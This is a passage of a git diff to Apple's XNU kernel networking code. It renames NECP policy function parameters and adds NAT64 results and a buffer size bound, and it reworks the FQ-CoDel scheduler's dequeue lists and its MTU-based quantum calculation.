-necp_socket_is_allowed_to_send_recv_v6(struct inpcb *inp, u_int16_t local_port, u_int16_t remote_port, struct in6_addr *local_addr, struct in6_addr *remote_addr, ifnet_t interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags)
+necp_socket_is_allowed_to_send_recv_v6(struct inpcb *inp, u_int16_t local_port, u_int16_t remote_port, struct in6_addr *local_addr, struct in6_addr *remote_addr, ifnet_t input_interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags)
 {
        struct sockaddr_in6 local = {};
        struct sockaddr_in6 remote = {};
@@ -9899,15 +10145,15 @@ necp_socket_is_allowed_to_send_recv_v6(struct inpcb *inp, u_int16_t local_port,
        memcpy(&local.sin6_addr, local_addr, sizeof(local.sin6_addr));
        memcpy(&remote.sin6_addr, remote_addr, sizeof(remote.sin6_addr));
 
-       return necp_socket_is_allowed_to_send_recv_internal(inp, (struct sockaddr *)&local, (struct sockaddr *)&remote, interface,
+       return necp_socket_is_allowed_to_send_recv_internal(inp, (struct sockaddr *)&local, (struct sockaddr *)&remote, input_interface,
                   pf_tag, return_policy_id, return_route_rule_id, return_skip_policy_id, return_pass_flags);
 }
 
 bool
-necp_socket_is_allowed_to_send_recv(struct inpcb *inp, ifnet_t interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id,
+necp_socket_is_allowed_to_send_recv(struct inpcb *inp, ifnet_t input_interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id,
     u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags)
 {
-       return necp_socket_is_allowed_to_send_recv_internal(inp, NULL, NULL, interface, pf_tag,
+       return necp_socket_is_allowed_to_send_recv_internal(inp, NULL, NULL, input_interface, pf_tag,
                   return_policy_id, return_route_rule_id,
                   return_skip_policy_id, return_pass_flags);
 }
index c2f39c6af5346d063985e6b2bf709bee8919ae3a..28c553dea626832dd9103b803da57f0c6b6be601 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2013-2020 Apple Inc. All rights reserved.
+ * Copyright (c) 2013-2021 Apple Inc. All rights reserved.
  *
  * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
  *
@@ -153,6 +153,7 @@ struct necp_packet_header {
 #define NECP_POLICY_CONDITION_SDK_VERSION               28      // struct necp_policy_condition_sdk_version
 #define NECP_POLICY_CONDITION_SIGNING_IDENTIFIER        29      // String
 #define NECP_POLICY_CONDITION_PACKET_FILTER_TAGS        30      // u_int16_t
+#define NECP_POLICY_CONDITION_DELEGATE_IS_PLATFORM_BINARY      32      // N/A
 
 /*
  * Policy Packet tags
@@ -203,6 +204,7 @@ struct necp_packet_header {
 #define NECP_ROUTE_RULE_ALLOW_INTERFACE                 2       // String, or empty to match all
 #define NECP_ROUTE_RULE_QOS_MARKING                             3       // String, or empty to match all
 #define NECP_ROUTE_RULE_DENY_LQM_ABORT                  4       // String, or empty to match all
+#define NECP_ROUTE_RULE_USE_NETAGENT                    5       // UUID, followed by string or empty
 
 #define NECP_ROUTE_RULE_FLAG_CELLULAR                   0x01
 #define NECP_ROUTE_RULE_FLAG_WIFI                       0x02
@@ -311,6 +313,7 @@ struct necp_aggregate_result {
        u_int32_t                                                       policy_id;
        uuid_t                                                          netagents[NECP_MAX_NETAGENTS];
        u_int32_t                                                       netagent_use_flags[NECP_MAX_NETAGENTS];
+       struct ipv6_prefix                                              nat64_prefixes[NAT64_MAX_NUM_PREFIXES];
        u_int8_t                                                        mss_recommended;
 };
 
@@ -645,6 +648,7 @@ typedef struct necp_cache_buffer {
 #define NECP_CLIENT_RESULT_EFFECTIVE_TRAFFIC_CLASS              210             // u_int32_t
 #define NECP_CLIENT_RESULT_TRAFFIC_MGMT_BG                              211             // u_int32_t, 1: background, 0: not background
 #define NECP_CLIENT_RESULT_GATEWAY                                      212             // struct necp_client_endpoint
+#define NECP_CLIENT_RESULT_NAT64                                        213             // struct ipv6_prefix[NAT64_MAX_NUM_PREFIXES]
 
 #define NECP_CLIENT_RESULT_FLAG_IS_LOCAL                                0x0001  // Routes to this device
 #define NECP_CLIENT_RESULT_FLAG_IS_DIRECT                               0x0002  // Routes to directly accessible peer
@@ -948,6 +952,8 @@ extern int necp_buffer_find_tlv(u_int8_t *buffer, u_int32_t buffer_length, int o
 #define NECPCTL_RESTRICT_MULTICAST                      20      /* Restrict multicast access */
 #define NECPCTL_DEDUP_POLICIES                          21      /* Dedup overlapping policies */
 
+#define NECP_LOOPBACK_PASS_ALL         1  // Pass all loopback traffic
+#define NECP_LOOPBACK_PASS_WITH_FILTER 2  // Pass all loopback traffic, but activate content filter and/or flow divert if applicable
 
 #define NECPCTL_NAMES {                                 \
        { 0, 0 },                                                       \
@@ -1047,6 +1053,7 @@ struct necp_kernel_socket_policy {
        struct necp_policy_condition_sdk_version cond_sdk_version;
        char                                            *cond_signing_identifier;   // String
        u_int16_t                                       cond_packet_filter_tags;
+       int32_t                                         cond_pid_version;
 
        necp_kernel_policy_result       result;
        necp_kernel_policy_result_parameter     result_parameter;
@@ -1116,12 +1123,13 @@ struct necp_aggregate_socket_result {
 };
 
 struct necp_inpcb_result {
-       u_int32_t                                                       app_id;
+       u_int32_t                                       app_id;
        necp_kernel_policy_id                           policy_id;
        necp_kernel_policy_id                           skip_policy_id;
-       int32_t                                                         policy_gencount;
-       u_int32_t                                                       flowhash;
-       struct necp_aggregate_socket_result     results;
+       int32_t                                         policy_gencount;
+       u_int32_t                                       flowhash;
+       u_int32_t                                       network_denied_notifies;// Notification count
+       struct necp_aggregate_socket_result             results;
 };
 
 extern errno_t necp_init(void);
@@ -1142,18 +1150,18 @@ extern u_int32_t necp_socket_get_effective_mtu(struct inpcb *inp, u_int32_t curr
 
 extern bool necp_socket_is_allowed_to_recv_on_interface(struct inpcb *inp, ifnet_t interface);
 
-extern bool necp_socket_is_allowed_to_send_recv(struct inpcb *inp, ifnet_t interface, u_int16_t pf_tag,
+extern bool necp_socket_is_allowed_to_send_recv(struct inpcb *inp, ifnet_t input_interface, u_int16_t pf_tag,
     necp_kernel_policy_id *return_policy_id,
     u_int32_t *return_route_rule_id,
     necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags);
 extern bool necp_socket_is_allowed_to_send_recv_v4(struct inpcb *inp, u_int16_t local_port,
     u_int16_t remote_port, struct in_addr *local_addr,
-    struct in_addr *remote_addr, ifnet_t interface, u_int16_t pf_tag,
+    struct in_addr *remote_addr, ifnet_t input_interface, u_int16_t pf_tag,
     necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id,
     necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags);
 extern bool necp_socket_is_allowed_to_send_recv_v6(struct inpcb *inp, u_int16_t local_port,
     u_int16_t remote_port, struct in6_addr *local_addr,
-    struct in6_addr *remote_addr, ifnet_t interface, u_int16_t pf_tag,
+    struct in6_addr *remote_addr, ifnet_t input_interface, u_int16_t pf_tag,
     necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id,
     necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags);
 extern void necp_socket_update_qos_marking(struct inpcb *inp, struct rtentry *route, u_int32_t route_rule_id);
index 0ef2776e30392d40882db8dee152a9c14316c306..bcd49fb78809759b24ed7c30838663f67f063ea6 100644 (file)
@@ -1484,11 +1484,12 @@ static void
 necp_client_add_interface_option_if_needed(struct necp_client *client,
     uint32_t interface_index,
     uint32_t interface_generation,
-    uuid_t *nexus_agent)
+    uuid_t *nexus_agent,
+    bool network_provider)
 {
-       if (interface_index == IFSCOPE_NONE ||
+       if ((interface_index == IFSCOPE_NONE && !network_provider) ||
            (client->interface_option_count != 0 && !client->allow_multiple_flows)) {
-               // Interface not set, or client not allowed to use this mode
+               // Interface or agent not set, or client not allowed to use this mode
                return;
        }
 
@@ -1913,7 +1914,8 @@ necp_client_add_browse_interface_options(struct necp_client *client,
                            (flags & NETAGENT_FLAG_SUPPORTS_BROWSE) &&
                            (!(flags & NETAGENT_FLAG_SPECIFIC_USE_ONLY) ||
                            necp_netagent_is_required(parsed_parameters, &ifp->if_agentids[i]))) {
-                               necp_client_add_interface_option_if_needed(client, ifp->if_index, ifnet_get_generation(ifp), &ifp->if_agentids[i]);
+                               necp_client_add_interface_option_if_needed(client, ifp->if_index, ifnet_get_generation(ifp),
+                                   &ifp->if_agentids[i], (flags & NETAGENT_FLAG_NETWORK_PROVIDER));
 
                                // Finding one is enough
                                break;
@@ -3531,6 +3533,15 @@ necp_update_client_result(proc_t proc,
                    client->result, sizeof(client->result));
        }
 
+       for (int i = 0; i < NAT64_MAX_NUM_PREFIXES; i++) {
+               if (result.nat64_prefixes[i].prefix_len != 0) {
+                       cursor = necp_buffer_write_tlv_if_different(cursor, NECP_CLIENT_RESULT_NAT64,
+                           sizeof(result.nat64_prefixes), result.nat64_prefixes, &updated,
+                           client->result, sizeof(client->result));
+                       break;
+               }
+       }
+
        if (result.mss_recommended != 0) {
                cursor = necp_buffer_write_tlv_if_different(cursor, NECP_CLIENT_RESULT_RECOMMENDED_MSS,
                    sizeof(result.mss_recommended), &result.mss_recommended, &updated,
@@ -3616,7 +3627,7 @@ necp_update_client_result(proc_t proc,
                        if (necp_ifnet_matches_parameters(multi_interface, parsed_parameters, 0, NULL, true, false)) {
                                // Add multipath interface flows for kernel MPTCP
                                necp_client_add_interface_option_if_needed(client, multi_interface->if_index,
-                                   ifnet_get_generation(multi_interface), NULL);
+                                   ifnet_get_generation(multi_interface), NULL, false);
 
                                // Add nexus agents for multipath
                                necp_client_add_agent_interface_options(client, parsed_parameters, multi_interface);
@@ -3631,7 +3642,7 @@ necp_update_client_result(proc_t proc,
 
                                // Add interface option in case it is not a nexus
                                necp_client_add_interface_option_if_needed(client, direct_interface->if_index,
-                                   ifnet_get_generation(direct_interface), NULL);
+                                   ifnet_get_generation(direct_interface), NULL, false);
                        }
                } else {
                        // Get listener interface options from global list
@@ -5635,7 +5646,8 @@ necp_client_add_flow(struct necp_fd_data *fd_data, struct necp_client_action_arg
                goto done;
        }
 
-       if (uap->buffer == 0 || buffer_size < sizeof(struct necp_client_add_flow)) {
+       if (uap->buffer == 0 || buffer_size < sizeof(struct necp_client_add_flow) ||
+           buffer_size > sizeof(struct necp_client_add_flow_default) * 4) {
                error = EINVAL;
                NECPLOG(LOG_ERR, "necp_client_add_flow invalid buffer (length %zu)", buffer_size);
                goto done;
index b34473e8b01dea1c49486dbff643466fc0d1d251..c7d058ec2f3042ef94a01243051fbef20a726555 100644 (file)
 #include <sys/types.h>
 #include <sys/param.h>
 #include <kern/zalloc.h>
+#include <net/ethernet.h>
 #include <net/if_var.h>
 #include <net/if.h>
 #include <net/classq/classq.h>
 #include <net/classq/classq_fq_codel.h>
 #include <net/pktsched/pktsched_fq_codel.h>
+#include <os/log.h>
+
+#define FQ_CODEL_DEFAULT_QUANTUM 1500
+
+#define FQ_CODEL_QUANTUM_BK_SYS(_q)    (_q)
+#define FQ_CODEL_QUANTUM_BK(_q)        (_q)
+#define FQ_CODEL_QUANTUM_BE(_q)        (_q)
+#define FQ_CODEL_QUANTUM_RD(_q)        (_q)
+#define FQ_CODEL_QUANTUM_OAM(_q)       (_q)
+#define FQ_CODEL_QUANTUM_AV(_q)        (_q * 2)
+#define FQ_CODEL_QUANTUM_RV(_q)        (_q * 2)
+#define FQ_CODEL_QUANTUM_VI(_q)        (_q * 2)
+#define FQ_CODEL_QUANTUM_VO(_q)        ((_q * 2) / 5)
+#define FQ_CODEL_QUANTUM_CTL(_q)       ((_q * 2) / 5)
+
+#define FQ_CODEL_DRR_MAX_BK_SYS    2
+#define FQ_CODEL_DRR_MAX_BK        2
+#define FQ_CODEL_DRR_MAX_BE        4
+#define FQ_CODEL_DRR_MAX_RD        4
+#define FQ_CODEL_DRR_MAX_OAM       4
+#define FQ_CODEL_DRR_MAX_AV        6
+#define FQ_CODEL_DRR_MAX_RV        6
+#define FQ_CODEL_DRR_MAX_VI        6
+#define FQ_CODEL_DRR_MAX_VO        8
+#define FQ_CODEL_DRR_MAX_CTL       8
 
 static ZONE_DECLARE(fq_if_zone, "pktsched_fq_if", sizeof(fq_if_t), ZC_ZFREE_CLEARMEM);
 
+typedef STAILQ_HEAD(, flowq) flowq_dqlist_t;
+
 static fq_if_t *fq_if_alloc(struct ifnet *, classq_pkt_type_t);
 static void fq_if_destroy(fq_if_t *fqs);
 static void fq_if_classq_init(fq_if_t *fqs, uint32_t priority,
     uint16_t quantum, uint32_t drr_max, uint32_t svc_class);
 static void fq_if_dequeue(fq_if_t *, fq_if_classq_t *, uint32_t,
     int64_t, classq_pkt_t *, classq_pkt_t *, uint32_t *,
-    uint32_t *, boolean_t drvmgmt);
+    uint32_t *, flowq_dqlist_t *, boolean_t drvmgmt);
 void fq_if_stat_sc(fq_if_t *fqs, cqrq_stat_sc_t *stat);
 static void fq_if_purge(fq_if_t *);
 static void fq_if_purge_classq(fq_if_t *, fq_if_classq_t *);
@@ -51,7 +79,7 @@ static void fq_if_purge_flow(fq_if_t *, fq_t *, u_int32_t *, u_int32_t *);
 static void fq_if_empty_new_flow(fq_t *fq, fq_if_classq_t *fq_cl,
     bool add_to_old);
 static void fq_if_empty_old_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl,
-    fq_t *fq, bool remove_hash);
+    fq_t *fq, bool remove_hash, bool destroy);
 
 #define FQ_IF_FLOW_HASH_ID(_flowid_) \
        (((_flowid_) >> FQ_IF_HASH_TAG_SHIFT) & FQ_IF_HASH_TAG_MASK)
@@ -75,8 +103,8 @@ fq_if_append_mbuf(classq_pkt_t *pkt, classq_pkt_t *next_pkt)
 
 static boolean_t
 fq_getq_flow_mbuf(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq,
-    int64_t byte_limit, u_int32_t pkt_limit, classq_pkt_t *top,
-    classq_pkt_t *last, u_int32_t *byte_cnt, u_int32_t *pkt_cnt,
+    int64_t byte_limit, u_int32_t pkt_limit, classq_pkt_t *head,
+    classq_pkt_t *tail, u_int32_t *byte_cnt, u_int32_t *pkt_cnt,
     boolean_t *qempty, u_int32_t pflags)
 {
        u_int32_t plen;
@@ -95,15 +123,15 @@ fq_getq_flow_mbuf(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq,
                fq->fq_deficit -= plen;
                pkt.pktsched_pkt_mbuf->m_pkthdr.pkt_flags |= pflags;
 
-               if (top->cp_mbuf == NULL) {
-                       *top = pkt.pktsched_pkt;
+               if (head->cp_mbuf == NULL) {
+                       *head = pkt.pktsched_pkt;
                } else {
-                       ASSERT(last->cp_mbuf != NULL);
-                       ASSERT(last->cp_mbuf->m_nextpkt == NULL);
-                       last->cp_mbuf->m_nextpkt = pkt.pktsched_pkt_mbuf;
+                       ASSERT(tail->cp_mbuf != NULL);
+                       ASSERT(tail->cp_mbuf->m_nextpkt == NULL);
+                       tail->cp_mbuf->m_nextpkt = pkt.pktsched_pkt_mbuf;
                }
-               *last = pkt.pktsched_pkt;
-               last->cp_mbuf->m_nextpkt = NULL;
+               *tail = pkt.pktsched_pkt;
+               tail->cp_mbuf->m_nextpkt = NULL;
                fq_cl->fcl_stat.fcl_dequeue++;
                fq_cl->fcl_stat.fcl_dequeue_bytes += plen;
                *pkt_cnt += 1;
@@ -321,6 +349,11 @@ fq_if_enqueue_classq(struct ifclassq *ifq, classq_pkt_t *head,
        IFCQ_INC_BYTES(ifq, bytes);
        IFCQ_UNLOCK(ifq);
 done:
+#if DEBUG || DEVELOPMENT
+       if (__improbable((ret == EQFULL) && (ifclassq_flow_control_adv == 0))) {
+               ret = 0;
+       }
+#endif /* DEBUG || DEVELOPMENT */
        return ret;
 }
 
@@ -344,22 +377,80 @@ fq_if_dequeue_sc_classq(struct ifclassq *ifq, mbuf_svc_class_t svc,
        fq_cl = &fqs->fqs_classq[pri];
 
        fq_if_dequeue(fqs, fq_cl, 1, CLASSQ_DEQUEUE_MAX_BYTE_LIMIT,
-           pkt, NULL, &total_pktcnt, &total_bytecnt, TRUE);
+           pkt, NULL, &total_pktcnt, &total_bytecnt, NULL, TRUE);
 
        IFCQ_XMIT_ADD(ifq, total_pktcnt, total_bytecnt);
 }
 
+static inline void
+fq_dqlist_add(flowq_dqlist_t *fq_dqlist_head, fq_t *fq)
+{
+       ASSERT(fq->fq_dq_head.cp_mbuf == NULL);
+       ASSERT(!fq->fq_in_dqlist);
+       STAILQ_INSERT_TAIL(fq_dqlist_head, fq, fq_dqlink);
+       fq->fq_in_dqlist = true;
+}
+
+static inline void
+fq_dqlist_remove(flowq_dqlist_t *fq_dqlist_head, fq_t *fq, classq_pkt_t *head,
+    classq_pkt_t *tail)
+{
+       ASSERT(fq->fq_in_dqlist);
+       if (fq->fq_dq_head.cp_mbuf == NULL) {
+               goto done;
+       }
+
+       if (head->cp_mbuf == NULL) {
+               *head = fq->fq_dq_head;
+       } else {
+               ASSERT(tail->cp_mbuf != NULL);
+
+               switch (fq->fq_ptype) {
+               case QP_MBUF:
+                       ASSERT(tail->cp_mbuf->m_nextpkt == NULL);
+                       tail->cp_mbuf->m_nextpkt = fq->fq_dq_head.cp_mbuf;
+                       ASSERT(fq->fq_dq_tail.cp_mbuf->m_nextpkt == NULL);
+                       break;
+               default:
+                       VERIFY(0);
+                       /* NOTREACHED */
+                       __builtin_unreachable();
+               }
+       }
+       *tail = fq->fq_dq_tail;
+done:
+       STAILQ_REMOVE(fq_dqlist_head, fq, flowq, fq_dqlink);
+       CLASSQ_PKT_INIT(&fq->fq_dq_head);
+       CLASSQ_PKT_INIT(&fq->fq_dq_tail);
+       fq->fq_in_dqlist = false;
+       if (fq->fq_flags & FQF_DESTROYED) {
+               fq_destroy(fq);
+       }
+}
+
+static inline void
+fq_dqlist_get_packet_list(flowq_dqlist_t *fq_dqlist_head, classq_pkt_t *head,
+    classq_pkt_t *tail)
+{
+       fq_t *fq, *tfq;
+
+       STAILQ_FOREACH_SAFE(fq, fq_dqlist_head, fq_dqlink, tfq) {
+               fq_dqlist_remove(fq_dqlist_head, fq, head, tail);
+       }
+}
+
 int
 fq_if_dequeue_classq_multi(struct ifclassq *ifq, u_int32_t maxpktcnt,
     u_int32_t maxbytecnt, classq_pkt_t *first_packet,
     classq_pkt_t *last_packet, u_int32_t *retpktcnt,
     u_int32_t *retbytecnt)
 {
-       u_int32_t pktcnt = 0, bytecnt = 0, total_pktcnt = 0, total_bytecnt = 0;
+       uint32_t total_pktcnt = 0, total_bytecnt = 0;
        classq_pkt_t first = CLASSQ_PKT_INITIALIZER(fisrt);
        classq_pkt_t last = CLASSQ_PKT_INITIALIZER(last);
        classq_pkt_t tmp = CLASSQ_PKT_INITIALIZER(tmp);
        fq_if_append_pkt_t append_pkt;
+       flowq_dqlist_t fq_dqlist_head;
        fq_if_classq_t *fq_cl;
        fq_if_t *fqs;
        int pri;
@@ -367,6 +458,7 @@ fq_if_dequeue_classq_multi(struct ifclassq *ifq, u_int32_t maxpktcnt,
        IFCQ_LOCK_ASSERT_HELD(ifq);
 
        fqs = (fq_if_t *)ifq->ifcq_disc;
+       STAILQ_INIT(&fq_dqlist_head);
 
        switch (fqs->fqs_ptype) {
        case QP_MBUF:
@@ -381,7 +473,8 @@ fq_if_dequeue_classq_multi(struct ifclassq *ifq, u_int32_t maxpktcnt,
        }
 
        for (;;) {
-               classq_pkt_t top = CLASSQ_PKT_INITIALIZER(top);
+               uint32_t pktcnt = 0, bytecnt = 0;
+               classq_pkt_t head = CLASSQ_PKT_INITIALIZER(head);
                classq_pkt_t tail = CLASSQ_PKT_INITIALIZER(tail);
 
                if (fqs->fqs_bitmaps[FQ_IF_ER] == 0 &&
@@ -419,26 +512,22 @@ fq_if_dequeue_classq_multi(struct ifclassq *ifq, u_int32_t maxpktcnt,
                        }
                }
                fq_if_dequeue(fqs, fq_cl, (maxpktcnt - total_pktcnt),
-                   (maxbytecnt - total_bytecnt), &top, &tail, &pktcnt,
-                   &bytecnt, FALSE);
-               if (top.cp_mbuf != NULL) {
-                       ASSERT(pktcnt > 0 && bytecnt > 0);
+                   (maxbytecnt - total_bytecnt), &head, &tail, &pktcnt,
+                   &bytecnt, &fq_dqlist_head, FALSE);
+               if (head.cp_mbuf != NULL) {
+                       ASSERT(STAILQ_EMPTY(&fq_dqlist_head));
                        if (first.cp_mbuf == NULL) {
-                               first = top;
-                               total_pktcnt = pktcnt;
-                               total_bytecnt = bytecnt;
+                               first = head;
                        } else {
                                ASSERT(last.cp_mbuf != NULL);
-                               append_pkt(&last, &top);
-                               total_pktcnt += pktcnt;
-                               total_bytecnt += bytecnt;
+                               append_pkt(&last, &head);
                        }
                        last = tail;
                        append_pkt(&last, &tmp);
-                       fq_cl->fcl_budget -= bytecnt;
-                       pktcnt = 0;
-                       bytecnt = 0;
                }
+               fq_cl->fcl_budget -= bytecnt;
+               total_pktcnt += pktcnt;
+               total_bytecnt += bytecnt;
 
                /*
                 * If the class has exceeded the budget but still has data
@@ -464,6 +553,8 @@ state_change:
                }
        }
 
+       fq_dqlist_get_packet_list(&fq_dqlist_head, &first, &last);
+
        if (__probable(first_packet != NULL)) {
                *first_packet = first;
        }
@@ -493,6 +584,7 @@ fq_if_dequeue_sc_classq_multi(struct ifclassq *ifq, mbuf_svc_class_t svc,
        classq_pkt_t first = CLASSQ_PKT_INITIALIZER(fisrt);
        classq_pkt_t last = CLASSQ_PKT_INITIALIZER(last);
        fq_if_append_pkt_t append_pkt;
+       flowq_dqlist_t fq_dqlist_head;
 
        switch (fqs->fqs_ptype) {
        case QP_MBUF:
@@ -506,6 +598,7 @@ fq_if_dequeue_sc_classq_multi(struct ifclassq *ifq, mbuf_svc_class_t svc,
                __builtin_unreachable();
        }
 
+       STAILQ_INIT(&fq_dqlist_head);
        pri = fq_if_service_to_priority(fqs, svc);
        fq_cl = &fqs->fqs_classq[pri];
        /*
@@ -515,28 +608,28 @@ fq_if_dequeue_sc_classq_multi(struct ifclassq *ifq, mbuf_svc_class_t svc,
         */
        while (total_pktcnt < maxpktcnt && total_bytecnt < maxbytecnt &&
            fq_cl->fcl_stat.fcl_pkt_cnt > 0) {
-               classq_pkt_t top = CLASSQ_PKT_INITIALIZER(top);
+               classq_pkt_t head = CLASSQ_PKT_INITIALIZER(head);
                classq_pkt_t tail = CLASSQ_PKT_INITIALIZER(tail);
                u_int32_t pktcnt = 0, bytecnt = 0;
 
                fq_if_dequeue(fqs, fq_cl, (maxpktcnt - total_pktcnt),
-                   (maxbytecnt - total_bytecnt), &top, &tail, &pktcnt,
-                   &bytecnt, TRUE);
-               if (top.cp_mbuf != NULL) {
+                   (maxbytecnt - total_bytecnt), &head, &tail, &pktcnt,
+                   &bytecnt, &fq_dqlist_head, TRUE);
+               if (head.cp_mbuf != NULL) {
                        if (first.cp_mbuf == NULL) {
-                               first = top;
-                               total_pktcnt = pktcnt;
-                               total_bytecnt = bytecnt;
+                               first = head;
                        } else {
                                ASSERT(last.cp_mbuf != NULL);
-                               append_pkt(&last, &top);
-                               total_pktcnt += pktcnt;
-                               total_bytecnt += bytecnt;
+                               append_pkt(&last, &head);
                        }
                        last = tail;
                }
+               total_pktcnt += pktcnt;
+               total_bytecnt += bytecnt;
        }
 
+       fq_dqlist_get_packet_list(&fq_dqlist_head, &first, &last);
+
        if (__probable(first_packet != NULL)) {
                *first_packet = first;
        }
@@ -581,10 +674,10 @@ fq_if_purge_flow(fq_if_t *fqs, fq_t *fq, u_int32_t *pktsp,
        if (fq->fq_flags & FQF_NEW_FLOW) {
                fq_if_empty_new_flow(fq, fq_cl, false);
        } else if (fq->fq_flags & FQF_OLD_FLOW) {
-               fq_if_empty_old_flow(fqs, fq_cl, fq, false);
+               fq_if_empty_old_flow(fqs, fq_cl, fq, false, true);
        }
 
-       fq_if_destroy_flow(fqs, fq_cl, fq);
+       fq_if_destroy_flow(fqs, fq_cl, fq, true);
 
        if (FQ_IF_CLASSQ_IDLE(fq_cl)) {
                int i;
@@ -663,6 +756,78 @@ fq_if_purge_sc(fq_if_t *fqs, cqrq_purge_sc_t *req)
        }
 }
 
+static uint16_t
+fq_if_calc_quantum(struct ifnet *ifp)
+{
+       uint16_t quantum;
+
+       switch (ifp->if_family) {
+       case IFNET_FAMILY_ETHERNET:
+               VERIFY((ifp->if_mtu + ETHER_HDR_LEN) <= UINT16_MAX);
+               quantum = (uint16_t)ifp->if_mtu + ETHER_HDR_LEN;
+               break;
+
+       case IFNET_FAMILY_CELLULAR:
+       case IFNET_FAMILY_IPSEC:
+       case IFNET_FAMILY_UTUN:
+               VERIFY(ifp->if_mtu <= UINT16_MAX);
+               quantum = (uint16_t)ifp->if_mtu;
+               break;
+
+       default:
+               quantum = FQ_CODEL_DEFAULT_QUANTUM;
+               break;
+       }
+
+       /*
+        * XXX: Skywalk native interface doesn't support HW TSO offload.
+        */
+       if (((ifp->if_eflags & IFEF_SKYWALK_NATIVE) == 0) &&
+           ((ifp->if_hwassist & IFNET_TSOF) != 0)) {
+               VERIFY(ifp->if_tso_v4_mtu <= UINT16_MAX);
+               VERIFY(ifp->if_tso_v6_mtu <= UINT16_MAX);
+               quantum = (uint16_t)MAX(ifp->if_tso_v4_mtu, ifp->if_tso_v6_mtu);
+               quantum = (quantum != 0) ? quantum : IF_MAXMTU;
+       }
+
+       quantum = MAX(FQ_CODEL_DEFAULT_QUANTUM, quantum);
+#if DEBUG || DEVELOPMENT
+       quantum = (fq_codel_quantum != 0) ? fq_codel_quantum : quantum;
+#endif /* DEBUG || DEVELOPMENT */
+       return quantum;
+}
+
+static void
+fq_if_mtu_update(fq_if_t *fqs)
+{
+#define _FQ_CLASSQ_UPDATE_QUANTUM(_fqs, _s, _q)    \
+       (_fqs)->fqs_classq[FQ_IF_ ## _s ## _INDEX].fcl_quantum = \
+       FQ_CODEL_QUANTUM_ ## _s(_q)
+
+       uint16_t quantum;
+
+       quantum = fq_if_calc_quantum(fqs->fqs_ifq->ifcq_ifp);
+
+       if ((fqs->fqs_flags & FQS_DRIVER_MANAGED) != 0) {
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, BK, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, BE, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, VI, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, VO, quantum);
+       } else {
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, BK_SYS, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, BK, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, BE, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, RD, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, OAM, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, AV, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, RV, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, VI, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, VO, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, CTL, quantum);
+       }
+#undef _FQ_CLASSQ_UPDATE_QUANTUM
+}
+
 static void
 fq_if_event(fq_if_t *fqs, cqev_t ev)
 {
@@ -673,6 +838,9 @@ fq_if_event(fq_if_t *fqs, cqev_t ev)
        case CLASSQ_EV_LINK_DOWN:
                fq_if_purge(fqs);
                break;
+       case CLASSQ_EV_LINK_MTU:
+               fq_if_mtu_update(fqs);
+               break;
        default:
                break;
        }
@@ -782,8 +950,14 @@ fq_if_setup_ifclassq(struct ifclassq *ifq, u_int32_t flags,
     classq_pkt_type_t ptype)
 {
 #pragma unused(flags)
+#define _FQ_CLASSQ_INIT(_fqs, _s, _q)                         \
+       fq_if_classq_init((_fqs), FQ_IF_ ## _s ## _INDEX,     \
+       FQ_CODEL_QUANTUM_ ## _s(_q), FQ_CODEL_DRR_MAX_ ## _s, \
+       MBUF_SC_ ## _s )
+
        struct ifnet *ifp = ifq->ifcq_ifp;
        fq_if_t *fqs = NULL;
+       uint16_t quantum;
        int err = 0;
 
        IFCQ_LOCK_ASSERT_HELD(ifq);
@@ -795,51 +969,39 @@ fq_if_setup_ifclassq(struct ifclassq *ifq, u_int32_t flags,
                return ENOMEM;
        }
 
+       quantum = fq_if_calc_quantum(ifp);
+
        if (flags & PKTSCHEDF_QALG_DRIVER_MANAGED) {
                fqs->fqs_flags |= FQS_DRIVER_MANAGED;
-               fq_if_classq_init(fqs, FQ_IF_BK_INDEX, 1500,
-                   2, MBUF_SC_BK);
-               fq_if_classq_init(fqs, FQ_IF_BE_INDEX, 1500,
-                   4, MBUF_SC_BE);
-               fq_if_classq_init(fqs, FQ_IF_VI_INDEX, 3000,
-                   6, MBUF_SC_VI);
-               fq_if_classq_init(fqs, FQ_IF_VO_INDEX, 600,
-                   8, MBUF_SC_VO);
+               _FQ_CLASSQ_INIT(fqs, BK, quantum);
+               _FQ_CLASSQ_INIT(fqs, BE, quantum);
+               _FQ_CLASSQ_INIT(fqs, VI, quantum);
+               _FQ_CLASSQ_INIT(fqs, VO, quantum);
        } else {
                /* SIG shares same INDEX with VI */
                _CASSERT(SCIDX_SIG == SCIDX_VI);
                _CASSERT(FQ_IF_SIG_INDEX == FQ_IF_VI_INDEX);
 
-               fq_if_classq_init(fqs, FQ_IF_BK_SYS_INDEX, 1500,
-                   2, MBUF_SC_BK_SYS);
